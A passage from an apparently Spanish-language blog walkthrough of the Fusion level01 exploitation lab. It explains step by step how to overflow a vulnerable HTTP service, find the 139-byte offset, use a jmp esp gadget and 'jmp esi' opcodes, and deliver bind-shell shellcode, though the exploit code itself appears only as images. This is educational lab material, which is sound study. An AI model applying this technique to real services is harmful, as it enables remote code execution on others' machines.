&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vamos a poner gdb entonces, para ello iremos a la carpeta /opt/fusion/bin y aquí ejecutamos lo siguiente:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXpJIqoM8JYGKEYMJzmeNHkt8DpfRlLai264zr9Zt55yoJgadXxZiRnGi4ryj-0ZEqmSKUttbYYDk9s87jv9FaBf2yfTQ6jDkTN1g-h1rZVOOg5ZQJnjcrV-6azdwa-q02wYv_p-4B7o/s1600/gdbconfiguracion.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;344&quot; data-original-width=&quot;720&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXpJIqoM8JYGKEYMJzmeNHkt8DpfRlLai264zr9Zt55yoJgadXxZiRnGi4ryj-0ZEqmSKUttbYYDk9s87jv9FaBf2yfTQ6jDkTN1g-h1rZVOOg5ZQJnjcrV-6azdwa-q02wYv_p-4B7o/s640/gdbconfiguracion.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Es necesario ejecutarlo como root, ya que es un proceso que está como super usuario, por tanto usaremos sudo, si os pide la contraseña, escribiremos &quot;godmode&quot;.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;El programa está escuchando en el puerto 20001, se puede ver con el comando netstat -apunto (podemos ejecutarlo como sudo si es necesario).&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para poder enviar comandos, tenemos que tener la máquina de exploiting y fusion en la misma red, para eso si estamos en virtual box, en la configuración de red podemos poner las dos en &quot;red nat&quot;:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUU2mKSN1_ZHFxxIrD6I1KGLRUCWF745BX8tFilZrZF5sDQz7nyGXjzeoz67wCHb0q1hRXN3zUJyp2h2KR4I6Keb2_Z-z3hg_kKlVqW-s5FkYT0ULqqdlS8auPvyIUT0W400DrfHs4n6M/s1600/rednat.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;428&quot; data-original-width=&quot;690&quot; height=&quot;396&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUU2mKSN1_ZHFxxIrD6I1KGLRUCWF745BX8tFilZrZF5sDQz7nyGXjzeoz67wCHb0q1hRXN3zUJyp2h2KR4I6Keb2_Z-z3hg_kKlVqW-s5FkYT0ULqqdlS8auPvyIUT0W400DrfHs4n6M/s640/rednat.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para esto tendríais que crear una red nat antes aquí un enlace de youtube que muestra el proceso: &lt;a href=&quot;https://www.youtube.com/watch?v=X-uBoEW9H2Q&quot; target=&quot;_blank&quot;&gt;https://www.youtube.com/watch?v=X-uBoEW9H2Q&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Una vez configurada la red, podéis ver con un ifconfig en la máquina fusion, la ip, en mi caso tiene la 10.0.2.13, y la de exploiting la 10.0.2.11.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Vamos a mandar desde la máquina de exploiting una petición a la máquina fusion:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIMOZ4e4BT7enCixwkRanJBwv47xXCXTbbaFEkuJqzLSBl0BMpxUmmBXgnDRMpCAcTgrtj52LFoi3Nt3FIvBm2JA2DZK4obbM6Ek1dKaJuWaNV7EFQQvGK71me81fp6uwl-fz0Mqk35rg/s1600/peticion.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;38&quot; data-original-width=&quot;1285&quot; height=&quot;18&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIMOZ4e4BT7enCixwkRanJBwv47xXCXTbbaFEkuJqzLSBl0BMpxUmmBXgnDRMpCAcTgrtj52LFoi3Nt3FIvBm2JA2DZK4obbM6Ek1dKaJuWaNV7EFQQvGK71me81fp6uwl-fz0Mqk35rg/s640/peticion.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&amp;nbsp;Y ahora una vez lanzado veamos el resultado en la máquina fusion para ello escribimos &quot;continue&quot;:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKdMEiUXehFi0tiacxo0IWNMCbL9Qk2YSU7chfIjJjA7ZXoEHFun_jPI33T2ltyJM5J6aNJDdTCX8RYocqtTXPExDRuTo0LFpLIdud-Rk5joYoxhO05PXmBV22qp8V87D8MiSBwDVogU/s1600/petada.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;139&quot; data-original-width=&quot;603&quot; height=&quot;146&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKdMEiUXehFi0tiacxo0IWNMCbL9Qk2YSU7chfIjJjA7ZXoEHFun_jPI33T2ltyJM5J6aNJDdTCX8RYocqtTXPExDRuTo0LFpLIdud-Rk5joYoxhO05PXmBV22qp8V87D8MiSBwDVogU/s640/petada.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Veamos los registros, a ver que tenemos:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJh-B8s74wbXfq0aXZBqa_GN4tg0VnlMFHJhecHpXo_gv7zXdDS4wF1LCPSQUCtv4wjq7wfaPoUVmnXPDwgbcswD8dl4ecLc6nczsFQD-FEROn4SsAEf0Dwg_BAQLQ61CVINz2pBVx9Q/s1600/registros.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;278&quot; data-original-width=&quot;649&quot; height=&quot;274&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJh-B8s74wbXfq0aXZBqa_GN4tg0VnlMFHJhecHpXo_gv7zXdDS4wF1LCPSQUCtv4wjq7wfaPoUVmnXPDwgbcswD8dl4ecLc6nczsFQD-FEROn4SsAEf0Dwg_BAQLQ61CVINz2pBVx9Q/s640/registros.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos eip se ha llenado de &#39;A&#39;s por tanto el buffer overflow es posible, ahora veamos el contenido de las direcciones de memoria de&amp;nbsp; los registros ya que algunos de estos apuntan a la pila.&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelkLYKgYaPWlQ_YvsCkWYdxcaZEenakG5kRj3dhdPUF2D1z3nh5vNupt9EvSPmy4oklHMMGkIMb4LZDyt20kn42P9DdxHNEqyRx6t34jBmbA1EgAUU0Lb8U9FXs-jura3JmFfoV9UGfI/s1600/registros2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;138&quot; data-original-width=&quot;703&quot; height=&quot;124&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelkLYKgYaPWlQ_YvsCkWYdxcaZEenakG5kRj3dhdPUF2D1z3nh5vNupt9EvSPmy4oklHMMGkIMb4LZDyt20kn42P9DdxHNEqyRx6t34jBmbA1EgAUU0Lb8U9FXs-jura3JmFfoV9UGfI/s640/registros2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos, esp apunta a 0x41414141 ya que habremos sobreescrito el valor de EIP y un poco más, y como sabemos ESP apunta al siguiente valor a donde se guardó EIP a la hora de hacer el &quot;ret&quot;. También vemos que el registro ESI, apunta a la segunda parte que enviamos, eso significa que podríamos meter ahí un shellcode, y si tenemos alguna instrucción en plan &quot;jmp esi&quot;, podríamos saltar a nuestra shellcode.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Usaremos la técnica que ya vimos para evitar toparnos con ASLR, JMP_ESP, recordemos que tratabamos de encontrar una instrucción para saltar a lo que estuviera apuntado por ESP, pero vamos a intentar buscar otra instrucción JMP ESI, por si existe y así saltar a un shellcode que metamos.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Lo veremos con un dibujito, ya que así lo vemos todo más sencillo:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelFY1-jfiTKfTVXmD4hEZO9H02f3jdQ7ri7IkGcPNJUTjqBovEq9s-2EaB3imdM1quqxLzB-GaLHQTZngqYDspEBJcbj8toHzCmrA1_ClV6LM2EvTsbAUoQEOtqTaYWg49z91l7s1FuI/s1600/stack.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;112&quot; data-original-width=&quot;802&quot; height=&quot;88&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelFY1-jfiTKfTVXmD4hEZO9H02f3jdQ7ri7IkGcPNJUTjqBovEq9s-2EaB3imdM1quqxLzB-GaLHQTZngqYDspEBJcbj8toHzCmrA1_ClV6LM2EvTsbAUoQEOtqTaYWg49z91l7s1FuI/s640/stack.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Como vemos, donde se guardó EIP, meteremos la dirección de &quot;jmp esp&quot;, y donde apunta ESP meteremos los códigos de operación de &quot;jmp esi&quot;, finalmente tras el HTTP/1.1 meteremos el shellcode con los NOPS, vamos entonces paso por paso:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Descubrir el máximo de &#39;A&#39;s que podemos meter como relleno&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Para ello usaremos pattern petater y en lugar de mandar 300 &#39;A&#39;s, mandaremos una cadena de 300 caracteres:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVu21b32DRjS7tX0ZiZsyyYNByEGehTR7M_Vr0wGBgFf_MdpEG7ckz_fsOvg0fPeD3h4-qf5JiqNXaF5YdiXrRtrdpEeLOIXqBa2Ou4QCfRcXGuzV2cCqpQL1XCy4UOZNP4DJb9P5-EjE/s1600/patternpetater1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;110&quot; data-original-width=&quot;1288&quot; height=&quot;54&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVu21b32DRjS7tX0ZiZsyyYNByEGehTR7M_Vr0wGBgFf_MdpEG7ckz_fsOvg0fPeD3h4-qf5JiqNXaF5YdiXrRtrdpEeLOIXqBa2Ou4QCfRcXGuzV2cCqpQL1XCy4UOZNP4DJb9P5-EjE/s640/patternpetater1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;textoutput&quot; id=&quot;dialogv58a4844146a0b_complement&quot; style=&quot;visibility: visible;&quot;&gt;Volvemos a establecer gdb, en la máquina fusion tal y como vimos antes con el nuevo PID que tenga (para ello ya sabéis ps -A | grep level01):&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHV9uz2RK_tyWzWI51tcIBG8rdhxh_obqMWLQjvx6iLnwIcWykIpzTPqs4onHirbRwfQrnUNASAjPMgyQD16ZSOe58HcJ5Y0SlRywI3OmoP_MW0gMlMmkW-8zn-9L_7br4KBNEPI4jSmk/s1600/gdbconfiguracion2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;367&quot; data-original-width=&quot;587&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHV9uz2RK_tyWzWI51tcIBG8rdhxh_obqMWLQjvx6iLnwIcWykIpzTPqs4onHirbRwfQrnUNASAjPMgyQD16ZSOe58HcJ5Y0SlRywI3OmoP_MW0gMlMmkW-8zn-9L_7br4KBNEPI4jSmk/s640/gdbconfiguracion2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Seguido escribimos continue, para que se queda a la espera de peticiones, ahora enviaremos la petición con la cadena de pattern petater:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgNHxqihX6Fb_Ml6MVzO9s46j4BFeaX0G49RJKXtMUPM_E6IvuK3JS1Ao45MAHBBO_5yIIEQBxFV4UIOBnwGVBRXt-o09rZffleRJhjUUhWWmWSn8tQeVc-OsHHR-weq8Qp3UCQ3Zk29M/s1600/peticion2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;73&quot; data-original-width=&quot;1293&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgNHxqihX6Fb_Ml6MVzO9s46j4BFeaX0G49RJKXtMUPM_E6IvuK3JS1Ao45MAHBBO_5yIIEQBxFV4UIOBnwGVBRXt-o09rZffleRJhjUUhWWmWSn8tQeVc-OsHHR-weq8Qp3UCQ3Zk29M/s1600/peticion2.JPG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Veamos el error en gdb:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8MdC32qE0rALzl7QV1F7U4uXkxIjY7iEquvldFWEexEk4-Q-hlskp8g5tmhblOu1uDCdYy9_ByAyTYPfYzdl3lfvS_3xjcRiQNh9bw5oahFI6Yk7M0ABkTuR1KyzASssyrkJe6CPbtfA/s1600/error.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;87&quot; data-original-width=&quot;527&quot; height=&quot;104&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8MdC32qE0rALzl7QV1F7U4uXkxIjY7iEquvldFWEexEk4-Q-hlskp8g5tmhblOu1uDCdYy9_ByAyTYPfYzdl3lfvS_3xjcRiQNh9bw5oahFI6Yk7M0ABkTuR1KyzASssyrkJe6CPbtfA/s640/error.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Introducimos el valor en PatternPetater y veamos que nos dice:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheZ91jdCHQ6bowgIaYqkdqMOe91XrDfV4LjnHlKxsWuLexnPETSdgq-HIwtC9hlHtwDRrXXBL7hEnt-4FWnyRaUaA7lmQI37lYk2QXzRN0vcfCC7IYYDHqWyhR9hpO6h3GKKS05dQBxt0/s1600/patternpetater2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;95&quot; data-original-width=&quot;863&quot; height=&quot;70&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheZ91jdCHQ6bowgIaYqkdqMOe91XrDfV4LjnHlKxsWuLexnPETSdgq-HIwtC9hlHtwDRrXXBL7hEnt-4FWnyRaUaA7lmQI37lYk2QXzRN0vcfCC7IYYDHqWyhR9hpO6h3GKKS05dQBxt0/s640/patternpetater2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos pattern petater nos dice que el máximo de bytes a introducir es 139, después sobreescribiríamos EIP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 2. Descubrir una dirección de memoria donde se encuentre un &quot;jmp esp&quot;&lt;br /&gt;
&lt;br /&gt;
Para ello usaremos msfelfscan:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6HX3Y9jHRIGaWlnFo7ZZ2BK-FfG3_4ieo7bnwYKfG1IXqOmzu3V9ALNW1R0n2KhzyHiRAWj8oYYYoz8Cb1-xRv4hVLDLKGPTK4J4gMQkiZTQoUdhxh_80jx7v3WKeIYts_JhsItRVfvA/s1600/jmp_esp.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;192&quot; data-original-width=&quot;724&quot; height=&quot;168&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6HX3Y9jHRIGaWlnFo7ZZ2BK-FfG3_4ieo7bnwYKfG1IXqOmzu3V9ALNW1R0n2KhzyHiRAWj8oYYYoz8Cb1-xRv4hVLDLKGPTK4J4gMQkiZTQoUdhxh_80jx7v3WKeIYts_JhsItRVfvA/s640/jmp_esp.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como vemos, tenemos la dirección de un &quot;jmp esp&quot; en 0x08049f4f.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 3. Obtener los opcodes de &quot;jmp esi&quot;&lt;br /&gt;
&lt;br /&gt;
Para ello podemos usar rasm2 de radare2, el cual tendremos en nuestra máquina de exploiting:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkrQiRn7q_nqHy1rChuO72ObXWbgZFvWjI8nK4-IC6lzeZhKH63HX7zatZBc_LluF0foO8g1kGR5K4jol2QvakKSH0Hi3bQeMRqoSlNwsOTegDdz2CuS9oHFaQNWfnDOzE4PaQeQtNwHA/s1600/rasm2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;36&quot; data-original-width=&quot;871&quot; height=&quot;26&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkrQiRn7q_nqHy1rChuO72ObXWbgZFvWjI8nK4-IC6lzeZhKH63HX7zatZBc_LluF0foO8g1kGR5K4jol2QvakKSH0Hi3bQeMRqoSlNwsOTegDdz2CuS9oHFaQNWfnDOzE4PaQeQtNwHA/s640/rasm2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Los opcodes serán entonces \xff\xe6.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 4. Crear un exploit usando un shellcode&lt;br /&gt;
&lt;br /&gt;
Daré ahora un código con un shellcode, el cual dejará en la máquina fusion, un puerto a la escucha, usaremos el bytecode de jmp esi, y la dirección de jmp esp.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9IrsjQrtKiATLUU5rCPg62khEB6QZfrBjT6hUZQ2O0dhx5m6tjt0Mr2VKpMZ1gCAdSCMlwUONW8H2FOdd2CY9SzUg92F4G1exVLQ0ZmpwcIkketZWQTgDtdPJgPKtzpf-R_l9dVl1KOI/s1600/exploit.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;613&quot; data-original-width=&quot;1290&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9IrsjQrtKiATLUU5rCPg62khEB6QZfrBjT6hUZQ2O0dhx5m6tjt0Mr2VKpMZ1gCAdSCMlwUONW8H2FOdd2CY9SzUg92F4G1exVLQ0ZmpwcIkketZWQTgDtdPJgPKtzpf-R_l9dVl1KOI/s640/exploit.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Como se puede ver, en request, montó todo lo que vamos a enviar, empezando por el GET, metiendo un buffer de 139 &#39;A&#39;s ya que era el máximo a introducir, y luego la dirección del salto a ESP apuntando a jmp esi. Finalmente tras el HTTP/1.1 metemos una gran cama de NOPs y un shellcode, el código del shellcode sería como el siguiente:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg49CFPx-GocIDMquchig4WeOOoRXT9RER6W2qLRojU7njgJvuayz-pI98u15kRPfoP9P7eyKzqDZ7B2w6hJ6df19DDSPxpOgp6EMQ0er8VpYwM1s9eg_EG6WUr0UydoSoiYC3EQOZQ4h4/s1600/shellcode1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;463&quot; data-original-width=&quot;844&quot; height=&quot;350&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg49CFPx-GocIDMquchig4WeOOoRXT9RER6W2qLRojU7njgJvuayz-pI98u15kRPfoP9P7eyKzqDZ7B2w6hJ6df19DDSPxpOgp6EMQ0er8VpYwM1s9eg_EG6WUr0UydoSoiYC3EQOZQ4h4/s640/shellcode1.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wDagbCopbht7eOyhfrYBBCTr0zbtA9T9f95oS9JnA61RcgJv0BIW_lUKlHRHA0FhG8HFXj9GBb9061Q8lIcgdYHfyOF44cK2UJr9040dWHn5V-IqtBsuHS_Cy9-_293Ky92xFMzmiH4/s1600/shellcode2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;622&quot; data-original-width=&quot;1124&quot; height=&quot;354&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wDagbCopbht7eOyhfrYBBCTr0zbtA9T9f95oS9JnA61RcgJv0BIW_lUKlHRHA0FhG8HFXj9GBb9061Q8lIcgdYHfyOF44cK2UJr9040dWHn5V-IqtBsuHS_Cy9-_293Ky92xFMzmiH4/s640/shellcode2.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF31HY6q_WH8KKu0MrdrU79WRmYvfyG2k6EFaN2VfNaBQ-1kbyRxyteo7_m0S86lzm5Zo0T4Wuz4YFXhyphenhyphenBoTVLrIkzbr5ZMSK4-hcl-B3V1DF3POap6pnL-voiF0-t8QyvlI6G0T_Qv6M/s1600/shellcode3.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;136&quot; data-original-width=&quot;800&quot; height=&quot;108&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF31HY6q_WH8KKu0MrdrU79WRmYvfyG2k6EFaN2VfNaBQ-1kbyRxyteo7_m0S86lzm5Zo0T4Wuz4YFXhyphenhyphenBoTVLrIkzbr5ZMSK4-hcl-B3V1DF3POap6pnL-voiF0-t8QyvlI6G0T_Qv6M/s640/shellcode3.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Vamos entonces a ejecutar el exploit y seguidamente, vamos a usar netcat para conectarnos a la shell que dejamos escuchando:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
